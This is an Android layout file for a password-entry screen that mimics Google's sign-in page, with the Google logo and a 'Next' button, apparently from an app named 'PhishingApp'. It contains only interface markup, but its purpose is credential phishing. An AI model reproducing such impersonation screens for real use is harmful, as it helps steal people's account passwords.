<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:background="@color/white"
    android:fitsSystemWindows="true"
    android:orientation="vertical"
    android:gravity="end"
    android:padding="26dp"
    android:theme="@style/ThemeOverlay.PhishingApp.FullscreenContainer"
    tools:context=".GoogleLoginPasswordActivity">

    <ImageView
        android:id="@+id/iv_back"
        android:layout_width="35dp"
        android:layout_height="35dp"
        android:layout_gravity="start|center"
        android:importantForAccessibility="no"
        android:padding="8dp"
        android:tint="@color/black"
        android:src="@drawable/ic_back" />

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:orientation="vertical"
        android:fitsSystemWindows="true"
        android:layout_marginTop="80dp"
        android:gravity="center">

        <ImageView
            android:layout_width="120dp"
            android:layout_height="80dp"
            android:importantForAccessibility="no"
            android:src="@drawable/google_logo" />

        <com.google.android.material.textview.MaterialTextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:text="@string/welcome"
            android:textAppearance="?attr/textAppearanceHeadline5"/>

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:orientation="horizontal"
            android:background="@drawable/ic_common_rect">

            <ImageView
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"/>

        </LinearLayout>

        <com.google.android.material.textview.MaterialTextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content" />

        <com.google.android.material.textfield.TextInputLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            style="@style/Widget.MaterialComponents.TextInputLayout.OutlinedBox"
            android:hint="@string/enter_your_password"
            app:boxStrokeColor="@color/blue"
            app:hintTextColor="@color/blue"
            app:boxCornerRadiusTopStart="8dp"
            app:boxCornerRadiusTopEnd="8dp"
            app:boxCornerRadiusBottomStart="8dp"
            app:boxCornerRadiusBottomEnd="8dp"
            app:boxStrokeErrorColor="@android:color/holo_red_dark"
            app:boxStrokeWidth="0.5dp">

            <com.google.android.material.textfield.TextInputEditText
                android:layout_width="match_parent"
                android:layout_height="match_parent"
                android:textCursorDrawable="@null"
                android:inputType="textPassword"
                android:maxLines="1"
                android:id="@+id/password_textFiled"
                android:textColor="@color/black"/>
        </com.google.android.material.textfield.TextInputLayout>
    </LinearLayout>


    <ProgressBar
        android:id="@+id/idPBLoading"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_centerInParent="true"
        android:indeterminate="true"
        android:layout_gravity="center"
        android:layout_marginTop="50dp"
        android:indeterminateTint="@color/primary"
        android:visibility="gone" />

    <com.google.android.material.button.MaterialButton
        android:layout_width="70dp"
        android:layout_height="34dp"
        android:insetTop="0dp"
        android:insetBottom="0dp"
        app:cornerRadius="6dp"
        android:backgroundTint="@color/blue"
        android:text="@string/next"
        android:layout_marginTop="54dp"
        android:textAppearance="?attr/textAppearanceCaption"
        android:id="@+id/password"
        android:textAllCaps="false"
        android:visibility="visible"
    />

</LinearLayout>